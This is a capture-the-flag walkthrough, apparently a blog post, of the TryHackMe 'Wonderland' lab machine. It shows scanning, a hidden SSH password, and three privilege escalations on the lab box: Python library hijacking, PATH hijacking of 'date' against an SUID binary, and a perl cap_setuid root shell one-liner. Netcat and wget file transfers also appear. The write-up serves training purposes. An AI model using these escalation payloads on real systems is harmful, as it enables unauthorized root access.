[THM] [Medium] Wonderland

This guide describes the process of completing the Wonderland booth on the TryHackMe platform. We will explore various stages including scanning, vulnerability exploitation, and privilege escalation. Following the White Rabbit, we will be able to immerse ourselves in the world of Wonderland and achieve root access to the target machine.

Intelligence service

The reconnaissance phase was omitted because nothing of note was found at the original site. Let's move straight to the scanning stage.

Scanning

1.NMAP

The NMAP tool was used to scan the network and identify open ports and services. It allows you to obtain information about service versions and their configuration.

We use the command:

nmap -sC -sV target_ip

Explanation of flags:

• sC: This flag runs Nmap scripts, equivalent to the –script=default option. The default scripts include checking for common vulnerabilities and collecting information.

• sV: This flag enables service version detection. Nmap will try to determine the versions of services running on open ports.

Scan results:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-03 18:39 MSK
Nmap scan report for target_ip
Host is up (0.066s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
|   256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_  256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.94 seconds

The scan showed the presence of an SSH server on port 22 and a web server on port 80.

DirBuster was used to search for hidden directories and files on the web server.

dirbuster -u http://target_ip /usr/share/wordlists/dirb/big.txt

Let's start scanning directories on the site. Note the unusual scan result:

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Starting OWASP DirBuster 1.0-RC1
Starting dir/file list based brute forcing

Dir found: / - 200
Dir found: /img/ - 200
Dir found: /r/ - 200
Dir found: /r/a/ - 200
Dir found: /r/a/b/ - 200
Dir found: /r/a/b/b/ - 200
Dir found: /r/a/b/b/i/ - 200
Dir found: /r/a/b/b/i/t/ - 200

Let's follow the links:

etc…

The stand description said to follow the rabbit, so we continue exploring the directories up to /r/a/b/b/i/t/. After examining the source code of the page, we discovered a hidden message:

<!DOCTYPE html>

<head>
    <title>Enter wonderland</title>
    <link rel="stylesheet" type="text/css" href="https://habr.com/main.css">
</head>

<body>
    <h1>Open the door and enter wonderland</h1>
    <p>"Oh, you’re sure to do that," said the Cat, "if you only walk long enough."</p>
    <p>Alice felt that this could not be denied, so she tried another question. "What sort of people live about here?"
    </p>
    <p>"In that direction,"" the Cat said, waving its right paw round, "lives a Hatter: and in that direction," waving
        the other paw, "lives a March Hare. Visit either you like: they’re both mad."</p>
    <p style="display: none;">alice:HowDothTheLittleCrocodileImproveHisShiningTail</p>
    <img src="https://habr.com/img/alice_door.png" style="height: 50rem;">
</body>

In addition to the quote from the fairy tale, you can notice a hint alice:HowDothTheLittleCrocodileImproveHisShiningTail

These details are similar to SSH credentials.

Gaining access

We use the found credentials to log into the target machine via SSH ssh alice@target_ip

alice@wonderland:~$ # Получаем доступ к хосту!!!!

After logging into the target machine as user alice, the first step is to explore the system for interesting files and directories.

drwxr-xr-x 5 alice alice 4096 May 25  2020 .
drwxr-xr-x 6 root  root  4096 May 25  2020 ..
lrwxrwxrwx 1 root  root     9 May 25  2020 .bash_history -> /dev/null
-rw-r--r-- 1 alice alice  220 May 25  2020 .bash_logout
-rw-r--r-- 1 alice alice 3771 May 25  2020 .bashrc
drwx------ 2 alice alice 4096 May 25  2020 .cache
drwx------ 3 alice alice 4096 May 25  2020 .gnupg
drwxrwxr-x 3 alice alice 4096 May 25  2020 .local
-rw-r--r-- 1 alice alice  807 May 25  2020 .profile
-rw------- 1 root  root    66 May 25  2020 root.txt
-rw-r--r-- 1 root  root  3577 May 25  2020 walrus_and_the_carpenter.py

We found two interesting files:

Let's pay attention to the owner of the files – this is root, while for the file root.txt only the owner himself has read rights, but anyone can read the second file.

Perhaps here it is worth organizing a small educational program about CHMOD (this set of characters at the beginning of each line).

This abbreviation denotes a set of rights that a particular user has when interacting with a file. There are three possible actions:

• execute: 1

• write: 2

• read: 4

By adding up the numbers you can determine what rights you have on the file. For example, 1 + 2 = 3 – performance and recording rights. In this case, file rights are determined for three user groups

For each, privileges are calculated and the rights to the file are written as a three-digit number, for example 755

• USER 7 = 1 + 2 + 4 (execute + write + read)

• USER GROUP 5 = 1 + 4 (execute + read)

• OTHER 5 = 1 + 4 (execute + read)

These rights can also be written as an abbreviation

Let's return to the walkthrough, the file walrus_and_the_carpenter.py has the rights -rw-r–r– we are interested in the last part r– this means that everyone from OTHER can read the file. However, since the owner of the folder we are in is alice, we can execute the file using the python interpreter.

Let's execute the command cat walrus_and_the_carpenter.py

import random
poem = """The sun was shining on the sea,
Shining with all his might:
.
. POEM TEXT
.
And that was scarcely odd, because
They’d eaten every one."""

for i in range(10):
    line = random.choice(poem.split("\n"))
    print("The line was:\t", line)

The file selects random lines from the poem and outputs them.

Well… Let's continue our search, let's go to the home directory and see what else is there.

>> ls -la ..
total 24
drwxr-xr-x  6 root      root      4096 May 25  2020 .
drwxr-xr-x 23 root      root      4096 May 25  2020 ..
drwxr-xr-x  5 alice     alice     4096 May 25  2020 alice
drwxr-x---  3 hatter    hatter    4096 May 25  2020 hatter
drwxr-x---  2 rabbit    rabbit    4096 May 25  2020 rabbit
drwxr-x---  6 tryhackme tryhackme 4096 May 25  2020 tryhackme

As you can see, there are quite a lot of interesting things, and we would like to see the contents of all directories, but we do not have the rights ((

Privilege escalation alice > rabbit

At this step it’s worth looking at what capabilities our alice has

>> sudo -l -U alice
Matching Defaults entries for alice on wonderland:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alice may run the following commands on wonderland:
    (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

As you can see, we can run that script walrus_and_the_carpenter.py as the rabbit user. Overall, we have found a vector for further action.

Since we can force the script to be executed on behalf of rabbit, this means we need to somehow insert code into the script that performs the actions we need. Please note that the script imports the random library; the library is pulled from a specific directory on the host.

Let's see where these files come from:

>> python3 -c 'import sys; print (sys.path)'
['', '/usr/lib/python36.zip', '/usr/lib/python3.6', '/usr/lib/python3.6/lib-dynload', '/usr/local/lib/python3.6/dist-packages', '/usr/lib/python3/dist-packages']

In general, the output looks standard, but the local folder is first in the list of paths.

What if we put the random.py file in the directory where we run the script?

import os
os.system("/bin/bash")

This will launch a bash shell as rabbit.

Privilege escalation rabbit > hatter

Let's return to the directory of this user, in it we see the binary file teaParty

>> ls -la rabbit/
total 40
drwxr-x--- 2 rabbit rabbit  4096 May 25  2020 .
drwxr-xr-x 6 root   root    4096 May 25  2020 ..
lrwxrwxrwx 1 root   root       9 May 25  2020 .bash_history -> /dev/null
-rw-r--r-- 1 rabbit rabbit   220 May 25  2020 .bash_logout
-rw-r--r-- 1 rabbit rabbit  3771 May 25  2020 .bashrc
-rw-r--r-- 1 rabbit rabbit   807 May 25  2020 .profile
-rwsr-sr-x 1 root   root   16816 May 25  2020 teaParty

Using the netcat utility, we will transfer this file to ourselves locally.

On a local machine

nc -lvnp 7777 > teaParty

On the host

nc host-ip 7777 < teaParty

For decompiling we use ghidra. This is new to me and I have not worked with this tool before, but after reading a couple of guides, I was able to figure it out. Having decompiled the teaParty file, we are greeted by the ghidra window. For those for whom ghidra was also a new product, I’ll briefly describe where it is:

1. The central panel contains a disassembled binary file

2. To the right of the central window, there is a decompiled representation of the function found in the binary (until we select the function we need, the window will be empty)

3. On the left in the Symbol tree tab are the symbols found in the binary

In our case, we are interested in the Functions tab in the Symbol tree. Let's select it and go to Decompile

Let's pay attention to the highlighted line, in it the program displays date + 1. In this case, date is stored in /bin/date. The story is similar to what we did when we replaced the random library with our script, only now we need to replace the date in bin so that the program can use our code. Let's return to the attacked host. Creating your own date file in the bin directory is a difficult task (generally impossible, we don’t have enough privileges to do this). In general, this can be circumvented by selecting a directory in which we have enough rights to create the file and specifying it in the PATH variable export PATH=/tmp:$PATH before bin in this case, when executing the command, the malicious file will be found before the real one. In search of a directory in which we can do this, let's go to the root directory of the machine, and the only option will be tmp/, where we will create our date. The script is almost identical to the previous one. (Remember to make it executable)

#!/bin/bash
/bin/bash

Let's run the teaParty script again.

>> ./teaParty 
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$ 

Escalation hatter > root

As you can see, everything went well and now we are acting on behalf of the hatter. Let's see what's in his directory.

drwxr-x--- 3 hatter hatter 4096 May 25  2020 .
drwxr-xr-x 6 root   root   4096 May 25  2020 ..
lrwxrwxrwx 1 root   root      9 May 25  2020 .bash_history -> /dev/null
-rw-r--r-- 1 hatter hatter  220 May 25  2020 .bash_logout
-rw-r--r-- 1 hatter hatter 3771 May 25  2020 .bashrc
drwxrwxr-x 3 hatter hatter 4096 May 25  2020 .local
-rw-r--r-- 1 hatter hatter  807 May 25  2020 .profile
-rw------- 1 hatter hatter   29 May 25  2020 password.txt

Of course, we are interested in the password.txt file.

cat password.txt 
WhyIsARavenLikeAWritingDesk?

Well, now is the time for LinEnum or similar tools to automatically find unsafe settings on Unix-like systems. Previously, I used netcat to transfer files, now for a change I suggest setting up an http server.

On our machine we use the command python3 -m http.serverand on the attacked host we use wget wget http://host-ip:8000/LinEnum.sh And then we’ll run it and look at the output

./LinEnum.sh 

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################

# www.rebootuser.com
# version 0.982

[-] Debug Info
[+] Thorough tests = Disabled

Scan started at:
...

It turned out quite funny, by adding date from tmp we broke LinEnum’s ability to display the scan start time, so let’s delete the unnecessary file and restart LinEnum. The output will be quite large and I advise you to dig around and see what information about the system this script produced.

Examining the output you can notice the group:

[+] Files with POSIX capabilities set:
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep

POSIX capabilities are a mechanism in Unix-like operating systems that allows certain privileged actions usually reserved for the superuser (root) to be delegated to ordinary users or processes.

Now let's use the site gtfobins. Quote:

“If the binary has the Linux CAP_SETUID capability set or it is executed by another binary with the capability set, it can be used as a backdoor to maintain privileged access by manipulating its own process UID.”

We’ll use this, select the required payload for perl and launch it.

/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

The result of our actions:

# whoami
root
# 

Now let's output alice/root.txt

cat alice/root.txt 
thm{***}

You probably have a question, where is the regular user flag. Well, at least this question arose for me, after sitting for another 30 minutes I finally decided to check the root directory and it’s funny, but the flag is located there).

Thank you for reading to this point!) This is my first article on Habr and I will be very glad to receive any feedback!